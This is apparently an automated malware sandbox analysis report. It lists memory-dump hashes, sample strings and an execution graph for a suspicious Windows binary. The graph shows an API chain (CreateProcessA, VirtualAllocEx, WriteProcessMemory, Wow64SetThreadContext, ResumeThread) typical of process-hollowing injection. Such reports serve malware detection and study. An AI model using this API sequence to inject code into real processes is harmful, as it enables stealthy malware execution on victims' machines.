                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: abc26218772c1f6ffdb385f49402332c4d5fed018cd59df969d12d6429a359b0
                    • Instruction ID: 8ba78da03cd3aac68e0b1c196c984b23a686a327139c978eb520d596bc53a50b
                    • Opcode Fuzzy Hash: abc26218772c1f6ffdb385f49402332c4d5fed018cd59df969d12d6429a359b0
                    • Instruction Fuzzy Hash: ECE1F674E042598FCB14DFA9C5809AEBBF2FF89304F24C269D815AB356D734A981CF64
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7efce1bc4f1d6062e248a4c71defdcd95082f534deb0db9b20b957d019c08185
                    • Instruction ID: 8f1c3f9880b2e9b687f989134c829817be51970745687ef2f89d08ae464192d6
                    • Opcode Fuzzy Hash: 7efce1bc4f1d6062e248a4c71defdcd95082f534deb0db9b20b957d019c08185
                    • Instruction Fuzzy Hash: C3E1D774E041598FCB14DFA9C5809AEFBF2FF89304F248169D815AB35AD734A981CFA1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a63b52e2675d79774b54392e46f2a5dbec5008ea346c3d3057326f6bdf200738
                    • Instruction ID: 35f8deee6a97d5bca6ddfa080fd7f8cd0e60a11b1b28bcdc18919cf192cf6aa3
                    • Opcode Fuzzy Hash: a63b52e2675d79774b54392e46f2a5dbec5008ea346c3d3057326f6bdf200738
                    • Instruction Fuzzy Hash: 53A16D32E00215CFCF26DFA4C88459EB7F2FF85304B15856AE801AB2A1DF71E91ACB41
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c1fc63e45cc90a82e38c7f29a33a5fb63f3b13da3745f7dd4081ecb303471bcb
                    • Instruction ID: 8d980c7094bf1e06af157890ea1bd74bc3df9f83298b80e3b966b2671333ff8b
                    • Opcode Fuzzy Hash: c1fc63e45cc90a82e38c7f29a33a5fb63f3b13da3745f7dd4081ecb303471bcb
                    • Instruction Fuzzy Hash: B5D10775D10B5A8ACB11EBA4D9906D9F3B2FF96300F50C79AD40937224EF706AC5CB91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad8cc9a57cf2274da5340566d5840fbe04527b731f3f00de40c2022bdc36f6b7
                    • Instruction ID: 2c2c9d794891460b1093692f267d4878bbba8dc20a8b0293f7b16dec328eb24c
                    • Opcode Fuzzy Hash: ad8cc9a57cf2274da5340566d5840fbe04527b731f3f00de40c2022bdc36f6b7
                    • Instruction Fuzzy Hash: 78910931E102198FCB54DF69C98069DF7F1BF89314F2486AAE819EB311EB71A985CF40
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9d30616addef136eb7a252c31e247dcf45df05020e9bf254de52ecc7241523b8
                    • Instruction ID: 201943ce3de9edcbafbb232a57be8e731b5d6f8bf625453994788abdb1412b91
                    • Opcode Fuzzy Hash: 9d30616addef136eb7a252c31e247dcf45df05020e9bf254de52ecc7241523b8
                    • Instruction Fuzzy Hash: 7E910B31E102198FCB54DF69C98069DF7F1BF89314F2486AAE519EB311EB71A985CF40
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 19acef399f67d1dede5c2ebb8e408b7369ae1903dff32df330d77ba539907f06
                    • Instruction ID: 954713a5111a76c20a09069f51012d0de3f3241eeb35ba4fe8ed2a6ed1ecc672
                    • Opcode Fuzzy Hash: 19acef399f67d1dede5c2ebb8e408b7369ae1903dff32df330d77ba539907f06
                    • Instruction Fuzzy Hash: EE511874E042198FCB14CFA9C5819AEFBF2BF89304F24C16AD819A7316D7356941CFA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 68605a211f33b5457b4ec914b0ffa0284236e157e4760d01f889ce62db9498c4
                    • Instruction ID: 17853e58521ae6ff072965a756a3ca6109a3aed708ef280162bccf3360ff400b
                    • Opcode Fuzzy Hash: 68605a211f33b5457b4ec914b0ffa0284236e157e4760d01f889ce62db9498c4
                    • Instruction Fuzzy Hash: 8A4182B5B1421ADBCB049FA8C5448EEFBB7FFC9250F50496AE905EB254D632CD41CB81
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15a77186ebb19996d0e0469b48cd83f28761e45eb974469730a630da702b5ef2
                    • Instruction ID: 8286f12d18c2c4299e65b77031a68294d4302fdc745df13fd9d3f56845d58c32
                    • Opcode Fuzzy Hash: 15a77186ebb19996d0e0469b48cd83f28761e45eb974469730a630da702b5ef2
                    • Instruction Fuzzy Hash: C0412671764705CFC320CB29C88999ABBF5FF89315F148C2AE45ACBA60D234E950CF51
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 86c7520bd5236303ce758576b147de60de16456b18d5cbcbe4745c354c6e89d9
                    • Instruction ID: b77a554331fd555a1beb3e298988aafff35348e03a9c851bb1547788446d1298
                    • Opcode Fuzzy Hash: 86c7520bd5236303ce758576b147de60de16456b18d5cbcbe4745c354c6e89d9
                    • Instruction Fuzzy Hash: CD41D371B50709CFC720CB69C88899ABBF1FF89315F148C2AD55ACBA64D234E950CF41
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c5776d3334b1136a5e9ac41f436bf3571ace9efac02686f804cdb112de65f518
                    • Instruction ID: 3abe6d419b720374bb2d1436d66adfc5a2873d6302648be2bcd1faab9df510be
                    • Opcode Fuzzy Hash: c5776d3334b1136a5e9ac41f436bf3571ace9efac02686f804cdb112de65f518
                    • Instruction Fuzzy Hash: 612138F2E142068BDB44CE6AC8450FFFBB6FBCA220F208D17D615E7251D6309A118BD1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8389581c6d44df754b78ff77e731ce7a5678fcdb0a7d1d93bb8b82aa5933aac2
                    • Instruction ID: 462daf40958f86315b46c6e3bb3e5f8db4749146df74eda3d139599a19f9424b
                    • Opcode Fuzzy Hash: 8389581c6d44df754b78ff77e731ce7a5678fcdb0a7d1d93bb8b82aa5933aac2
                    • Instruction Fuzzy Hash: 0B21F5F2F101068BDB84CE9AD8850FFFBB6FBCA220F208D179615E7250D63099518BD1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq
                    • API String ID: 0-616753591
                    • Opcode ID: d5903d6681b9d4f77b366380f8a31235e82b2722cd2bf9dfdde23a620946183d
                    • Instruction ID: c8881aa4ad5fd6324ae02302696efb53a7b4a64e522e33a90838603c0527b581
                    • Opcode Fuzzy Hash: d5903d6681b9d4f77b366380f8a31235e82b2722cd2bf9dfdde23a620946183d
                    • Instruction Fuzzy Hash: F9318874B0010A9FCB49EB69E8605BEBBB7FFC1204B5084AAD5059B2A6DB316905CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq
                    • API String ID: 0-616753591
                    • Opcode ID: 30d91b2dd4ff3c2f791b9fe34ef5485056c784bfa2138ad79a325992f9487af5
                    • Instruction ID: c1f96735b06eb44250f0da19c28d12c0a98b7155b43c5c9f77cf66994a739fa3
                    • Opcode Fuzzy Hash: 30d91b2dd4ff3c2f791b9fe34ef5485056c784bfa2138ad79a325992f9487af5
                    • Instruction Fuzzy Hash: 5F214870E0010A9FCB09EBA9D9605BEB7B7FF85300F50846AC505AB2B5EB3029458B91

                    Execution Graph

                    Execution Coverage:11.8%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:195
                    Total number of Limit Nodes:10
                    execution_graph 22837 12a4668 22838 12a4672 22837->22838 22840 12a4759 22837->22840 22841 12a477d 22840->22841 22845 12a4868 22841->22845 22849 12a4858 22841->22849 22847 12a488f 22845->22847 22846 12a496c 22846->22846 22847->22846 22853 12a44b0 22847->22853 22851 12a4868 22849->22851 22850 12a496c 22850->22850 22851->22850 22852 12a44b0 CreateActCtxA 22851->22852 22852->22850 22854 12a58f8 CreateActCtxA 22853->22854 22856 12a59bb 22854->22856 22889 4aeaa48 22890 4aeabd3 22889->22890 22892 4aeaa6e 22889->22892 22892->22890 22893 4ae8e4c 22892->22893 22894 4aeacc8 PostMessageW 22893->22894 22895 4aead34 22894->22895 22895->22892 22857 12aabf0 22858 12aabff 22857->22858 22861 12aace8 22857->22861 22869 12aacd8 22857->22869 22862 12aacf9 22861->22862 22863 12aad1c 22861->22863 22862->22863 22877 12aaf70 22862->22877 22881 12aaf80 22862->22881 22863->22858 22864 12aad14 22864->22863 22865 12aaf20 GetModuleHandleW 22864->22865 22866 12aaf4d 22865->22866 22866->22858 22870 12aacf9 22869->22870 22871 12aad1c 22869->22871 22870->22871 22875 12aaf70 LoadLibraryExW 22870->22875 22876 12aaf80 LoadLibraryExW 22870->22876 22871->22858 22872 12aad14 22872->22871 22873 12aaf20 GetModuleHandleW 22872->22873 22874 12aaf4d 22873->22874 22874->22858 22875->22872 22876->22872 22878 12aaf94 22877->22878 22880 12aafb9 22878->22880 22885 12aa070 22878->22885 22880->22864 22883 12aaf94 22881->22883 22882 12aafb9 22882->22864 22883->22882 22884 12aa070 LoadLibraryExW 22883->22884 22884->22882 22886 12ab160 LoadLibraryExW 22885->22886 22888 12ab1d9 22886->22888 22888->22880 22896 12acf80 22897 12acfc6 GetCurrentProcess 22896->22897 22899 12ad018 GetCurrentThread 22897->22899 22902 12ad011 22897->22902 22900 12ad04e 22899->22900 22901 12ad055 GetCurrentProcess 22899->22901 22900->22901 22905 12ad08b 22901->22905 22902->22899 22903 12ad0b3 GetCurrentThreadId 22904 12ad0e4 22903->22904 22905->22903 23089 12ad5d0 DuplicateHandle 23090 12ad666 23089->23090 22906 4ae7845 22907 4ae752b 22906->22907 22908 4ae7540 22906->22908 22907->22908 22911 4ae970e 22907->22911 22916 4ae9710 22907->22916 22912 4ae972a 22911->22912 22921 4ae9a90 22912->22921 22938 4ae9a81 22912->22938 22913 4ae9732 22913->22908 22917 4ae972a 22916->22917 22919 4ae9a90 12 API calls 22917->22919 22920 4ae9a81 12 API calls 22917->22920 22918 4ae9732 22918->22908 22919->22918 22920->22918 22922 4ae9aa5 22921->22922 22923 4ae9ab7 22922->22923 22955 4ae9e6d 22922->22955 22959 4ae9bb2 22922->22959 22965 4aea4d5 22922->22965 22970 4ae9fb5 22922->22970 22980 4ae9d58 22922->22980 22986 4aea1fb 22922->22986 22993 4ae9fa1 22922->22993 22997 4aea301 22922->22997 23004 4aea2e0 22922->23004 23008 4ae9ee3 22922->23008 23012 4aea104 22922->23012 23016 4ae9ba7 22922->23016 23021 4ae9b88 22922->23021 23026 4aea36a 22922->23026 22923->22913 22939 4ae9a90 22938->22939 22940 4ae9ab7 22939->22940 22941 4ae9e6d 2 API calls 22939->22941 22942 4aea36a 2 API calls 22939->22942 22943 4ae9b88 2 API calls 22939->22943 22944 4ae9ba7 2 API calls 22939->22944 22945 4aea104 2 API calls 22939->22945 22946 4ae9ee3 2 API calls 22939->22946 22947 4aea2e0 2 API calls 22939->22947 22948 4aea301 4 API calls 22939->22948 22949 4ae9fa1 2 API calls 22939->22949 22950 4aea1fb 4 API calls 22939->22950 22951 4ae9d58 4 API calls 22939->22951 22952 4ae9fb5 4 API calls 22939->22952 22953 4aea4d5 2 API calls 22939->22953 22954 4ae9bb2 2 API calls 22939->22954 22940->22913 22941->22940 22942->22940 22943->22940 22944->22940 22945->22940 22946->22940 22947->22940 22948->22940 22949->22940 22950->22940 22951->22940 22952->22940 22953->22940 22954->22940 22956 4ae9e87 22955->22956 23031 4ae6f78 22956->23031 23035 4ae6f80 22956->23035 22961 4ae9b89 22959->22961 22960 4ae9c37 22960->22923 22961->22960 23039 4ae7118 22961->23039 23043 4ae7113 22961->23043 22966 4aea2d8 22965->22966 22967 4aea5e6 22966->22967 23047 4ae6e8b 22966->23047 23051 4ae6e90 22966->23051 22971 4ae9fba 22970->22971 22972 4ae9fe3 22971->22972 22975 4aea381 22971->22975 23055 4ae6cf8 22972->23055 23059 4ae6cf3 22972->23059 22973 4aea1dc 22974 4aea6a0 22974->22923 22975->22974 23063 4aea9f0 22975->23063 23068 4aeaa00 22975->23068 22984 4ae6cf8 Wow64SetThreadContext 22980->22984 22985 4ae6cf3 Wow64SetThreadContext 22980->22985 22981 4ae9d72 22982 4ae6f78 ReadProcessMemory 22981->22982 22983 4ae6f80 ReadProcessMemory 22981->22983 22982->22981 22983->22981 22984->22981 22985->22981 22987 4aea16a 22986->22987 22987->22986 22988 4aea4cf 22987->22988 22989 4ae6e8b WriteProcessMemory 22987->22989 22990 4ae6e90 WriteProcessMemory 22987->22990 23081 4ae6dc8 22987->23081 23085 4ae6dd0 22987->23085 22988->22923 22989->22987 22990->22987 22994 4ae9fa2 22993->22994 22995 4ae6f78 ReadProcessMemory 22994->22995 22996 4ae6f80 ReadProcessMemory 22994->22996 22995->22994 22996->22994 22999 4aea16a 22997->22999 22998 4aea4cf 22998->22923 22999->22997 22999->22998 23000 4ae6e8b WriteProcessMemory 22999->23000 23001 4ae6e90 WriteProcessMemory 22999->23001 23002 4ae6dc8 VirtualAllocEx 22999->23002 23003 4ae6dd0 VirtualAllocEx 22999->23003 23000->22999 23001->22999 23002->22999 23003->22999 23005 4aea2fa 23004->23005 23006 4ae6f78 ReadProcessMemory 23005->23006 23007 4ae6f80 ReadProcessMemory 23005->23007 23006->23005 23007->23005 23009 4ae9e6c 23008->23009 23010 4ae6f78 ReadProcessMemory 23009->23010 23011 4ae6f80 ReadProcessMemory 23009->23011 23010->23009 23011->23009 23014 4ae6e8b WriteProcessMemory 23012->23014 23015 4ae6e90 WriteProcessMemory 23012->23015 23013 4aea134 23014->23013 23015->23013 23017 4ae9b89 23016->23017 23019 4ae7118 CreateProcessA 23017->23019 23020 4ae7113 CreateProcessA 23017->23020 23018 4ae9ce6 23018->22923 23019->23018 23020->23018 23022 4ae9b89 23021->23022 23024 4ae7118 CreateProcessA 23022->23024 23025 4ae7113 CreateProcessA 23022->23025 23023 4ae9ce6 23023->22923 23024->23023 23025->23023 23027 4aea370 23026->23027 23029 4aea9f0 2 API calls 23027->23029 23030 4aeaa00 2 API calls 23027->23030 23028 4aea30c 23029->23028 23030->23028 23032 4ae6fcb ReadProcessMemory 23031->23032 23034 4ae700f 23032->23034 23034->22956 23036 4ae6fcb ReadProcessMemory 23035->23036 23038 4ae700f 23036->23038 23038->22956 23040 4ae71a1 CreateProcessA 23039->23040 23042 4ae7363 23040->23042 23044 4ae711a CreateProcessA 23043->23044 23046 4ae7363 23044->23046 23048 4ae6ed8 WriteProcessMemory 23047->23048 23050 4ae6f2f 23048->23050 23050->22966 23052 4ae6ed8 WriteProcessMemory 23051->23052 23054 4ae6f2f 23052->23054 23054->22966 23056 4ae6d3d Wow64SetThreadContext 23055->23056 23058 4ae6d85 23056->23058 23058->22973 23060 4ae6d3d Wow64SetThreadContext 23059->23060 23062 4ae6d85 23060->23062 23062->22973 23064 4aeaa00 23063->23064 23073 4ae6c48 23064->23073 23077 4ae6c43 23064->23077 23065 4aeaa28 23065->22973 23069 4aeaa15 23068->23069 23071 4ae6c48 ResumeThread 23069->23071 23072 4ae6c43 ResumeThread 23069->23072 23070 4aeaa28 23070->22973 23071->23070 23072->23070 23074 4ae6c88 ResumeThread 23073->23074 23076 4ae6cb9 23074->23076 23076->23065 23078 4ae6c88 ResumeThread 23077->23078 23080 4ae6cb9 23078->23080 23080->23065 23082 4ae6e10 VirtualAllocEx 23081->23082 23084 4ae6e4d 23082->23084 23084->22987 23086 4ae6e10 VirtualAllocEx 23085->23086 23088 4ae6e4d 23086->23088 23088->22987

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 294 12acf71-12acf78 295 12acf7a-12ad00f GetCurrentProcess 294->295 296 12acf32-12acf6f 294->296 304 12ad018-12ad04c GetCurrentThread 295->304 305 12ad011-12ad017 295->305 306 12ad04e-12ad054 304->306 307 12ad055-12ad089 GetCurrentProcess 304->307 305->304 306->307 309 12ad08b-12ad091 307->309 310 12ad092-12ad0ad call 12ad558 307->310 309->310 314 12ad0b3-12ad0e2 GetCurrentThreadId 310->314 315 12ad0eb-12ad14d 314->315 316 12ad0e4-12ad0ea 314->316 316->315
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 012ACFFE
                    • GetCurrentThread.KERNEL32 ref: 012AD03B
                    • GetCurrentProcess.KERNEL32 ref: 012AD078
                    • GetCurrentThreadId.KERNEL32 ref: 012AD0D1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID: 4'eq
                    • API String ID: 2063062207-1552367303
                    • Opcode ID: ed664c7ee961e01a85f0fbdd93a0554e8565d672174f319cea0be99970b76d90
                    • Instruction ID: 2503167a12c085768341d947201fbfedbaaeb9a25a98437043c206401255a147
                    • Opcode Fuzzy Hash: ed664c7ee961e01a85f0fbdd93a0554e8565d672174f319cea0be99970b76d90
                    • Instruction Fuzzy Hash: 166199B0900209CFDB15DFA9D948BDEBBF1EF89304F208459E509A7361D735A945CB61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 323 12acf80-12ad00f GetCurrentProcess 327 12ad018-12ad04c GetCurrentThread 323->327 328 12ad011-12ad017 323->328 329 12ad04e-12ad054 327->329 330 12ad055-12ad089 GetCurrentProcess 327->330 328->327 329->330 331 12ad08b-12ad091 330->331 332 12ad092-12ad0ad call 12ad558 330->332 331->332 336 12ad0b3-12ad0e2 GetCurrentThreadId 332->336 337 12ad0eb-12ad14d 336->337 338 12ad0e4-12ad0ea 336->338 338->337
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 012ACFFE
                    • GetCurrentThread.KERNEL32 ref: 012AD03B
                    • GetCurrentProcess.KERNEL32 ref: 012AD078
                    • GetCurrentThreadId.KERNEL32 ref: 012AD0D1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID:
                    • API String ID: 2063062207-0
                    • Opcode ID: 4de7b0bf45698253c61d6a285182e6b789fd27040d9336ee863be253e4616f87
                    • Instruction ID: 0cbff0704f8927fe22d26461e66fbd9761e0d4dec286dff1f1cdb1af923db07e
                    • Opcode Fuzzy Hash: 4de7b0bf45698253c61d6a285182e6b789fd27040d9336ee863be253e4616f87
                    • Instruction Fuzzy Hash: 465163B09003098FEB14DFAAD948B9EBBF1EF89314F208019E509A7360D775A945CFA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 386 4ae7113-4ae71ad 389 4ae71af-4ae71b9 386->389 390 4ae71e6-4ae7206 386->390 389->390 391 4ae71bb-4ae71bd 389->391 395 4ae723f-4ae726e 390->395 396 4ae7208-4ae7212 390->396 393 4ae71bf-4ae71c9 391->393 394 4ae71e0-4ae71e3 391->394 397 4ae71cd-4ae71dc 393->397 398 4ae71cb 393->398 394->390 406 4ae72a7-4ae7361 CreateProcessA 395->406 407 4ae7270-4ae727a 395->407 396->395 399 4ae7214-4ae7216 396->399 397->397 400 4ae71de 397->400 398->397 401 4ae7218-4ae7222 399->401 402 4ae7239-4ae723c 399->402 400->394 404 4ae7226-4ae7235 401->404 405 4ae7224 401->405 402->395 404->404 408 4ae7237 404->408 405->404 418 4ae736a-4ae73f0 406->418 419 4ae7363-4ae7369 406->419 407->406 409 4ae727c-4ae727e 407->409 408->402 411 4ae7280-4ae728a 409->411 412 4ae72a1-4ae72a4 409->412 413 4ae728e-4ae729d 411->413 414 4ae728c 411->414 412->406 413->413 415 4ae729f 413->415 414->413 415->412 429 4ae73f2-4ae73f6 418->429 430 4ae7400-4ae7404 418->430 419->418 429->430 433 4ae73f8 429->433 431 4ae7406-4ae740a 430->431 432 4ae7414-4ae7418 430->432 431->432 434 4ae740c 431->434 435 4ae741a-4ae741e 432->435 436 4ae7428-4ae742c 432->436 433->430 434->432 435->436 437 4ae7420 435->437 438 4ae743e-4ae7445 436->438 439 4ae742e-4ae7434 436->439 437->436 440 4ae745c 438->440 441 4ae7447-4ae7456 438->441 439->438 442 4ae745d 440->442 441->440 442->442
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04AE734E
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 18cb122fc75850c1c3aef502209d40314a6b506ea468cd91a39634729eaad6b9
                    • Instruction ID: 941c9b62c311bc310e813ccb9e6ad405a6a96ad01ba908cb8486ff8c6b114564
                    • Opcode Fuzzy Hash: 18cb122fc75850c1c3aef502209d40314a6b506ea468cd91a39634729eaad6b9
                    • Instruction Fuzzy Hash: 7E918C75D003199FEB10DFA9C840BEDBBB2FF48314F148569E818A7290DB74A985CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 444 4ae7118-4ae71ad 446 4ae71af-4ae71b9 444->446 447 4ae71e6-4ae7206 444->447 446->447 448 4ae71bb-4ae71bd 446->448 452 4ae723f-4ae726e 447->452 453 4ae7208-4ae7212 447->453 450 4ae71bf-4ae71c9 448->450 451 4ae71e0-4ae71e3 448->451 454 4ae71cd-4ae71dc 450->454 455 4ae71cb 450->455 451->447 463 4ae72a7-4ae7361 CreateProcessA 452->463 464 4ae7270-4ae727a 452->464 453->452 456 4ae7214-4ae7216 453->456 454->454 457 4ae71de 454->457 455->454 458 4ae7218-4ae7222 456->458 459 4ae7239-4ae723c 456->459 457->451 461 4ae7226-4ae7235 458->461 462 4ae7224 458->462 459->452 461->461 465 4ae7237 461->465 462->461 475 4ae736a-4ae73f0 463->475 476 4ae7363-4ae7369 463->476 464->463 466 4ae727c-4ae727e 464->466 465->459 468 4ae7280-4ae728a 466->468 469 4ae72a1-4ae72a4 466->469 470 4ae728e-4ae729d 468->470 471 4ae728c 468->471 469->463 470->470 472 4ae729f 470->472 471->470 472->469 486 4ae73f2-4ae73f6 475->486 487 4ae7400-4ae7404 475->487 476->475 486->487 490 4ae73f8 486->490 488 4ae7406-4ae740a 487->488 489 4ae7414-4ae7418 487->489 488->489 491 4ae740c 488->491 492 4ae741a-4ae741e 489->492 493 4ae7428-4ae742c 489->493 490->487 491->489 492->493 494 4ae7420 492->494 495 4ae743e-4ae7445 493->495 496 4ae742e-4ae7434 493->496 494->493 497 4ae745c 495->497 498 4ae7447-4ae7456 495->498 496->495 499 4ae745d 497->499 498->497 499->499
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04AE734E
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 2c37770f77ebaabd548b9a2ee3cafd2cad6a94b60490e4a264d4c5c7d40b1738
                    • Instruction ID: 6ac3110423dc5c55b6a3f622fdf9a09fb6296c2e08e2af2fd2f38013ba4a5026
                    • Opcode Fuzzy Hash: 2c37770f77ebaabd548b9a2ee3cafd2cad6a94b60490e4a264d4c5c7d40b1738
                    • Instruction Fuzzy Hash: DF917A75D0031A9FEB10DFA9C840BEDBBB2FF48314F148569E818A7250DB75A985CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 501 12aace8-12aacf7 502 12aacf9-12aad06 call 12aa00c 501->502 503 12aad23-12aad27 501->503 508 12aad08 502->508 509 12aad1c 502->509 505 12aad3b-12aad7c 503->505 506 12aad29-12aad33 503->506 512 12aad89-12aad97 505->512 513 12aad7e-12aad86 505->513 506->505 556 12aad0e call 12aaf70 508->556 557 12aad0e call 12aaf80 508->557 509->503 514 12aadbb-12aadbd 512->514 515 12aad99-12aad9e 512->515 513->512 520 12aadc0-12aadc7 514->520 517 12aada9 515->517 518 12aada0-12aada7 call 12aa018 515->518 516 12aad14-12aad16 516->509 519 12aae58-12aaf18 516->519 522 12aadab-12aadb9 517->522 518->522 551 12aaf1a-12aaf1d 519->551 552 12aaf20-12aaf4b GetModuleHandleW 519->552 523 12aadc9-12aadd1 520->523 524 12aadd4-12aaddb 520->524 522->520 523->524 526 12aade8-12aadf1 call 12aa028 524->526 527 12aaddd-12aade5 524->527 532 12aadfe-12aae03 526->532 533 12aadf3-12aadfb 526->533 527->526 534 12aae21-12aae25 532->534 535 12aae05-12aae0c 532->535 533->532 558 12aae28 call 12ab280 534->558 559 12aae28 call 12ab251 534->559 535->534 537 12aae0e-12aae1e call 12aa038 call 12aa048 535->537 537->534 540 12aae2b-12aae2e 542 12aae30-12aae4e 540->542 543 12aae51-12aae57 540->543 542->543 551->552 553 12aaf4d-12aaf53 552->553 554 12aaf54-12aaf68 552->554 553->554 556->516 557->516 558->540 559->540
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 012AAF3E
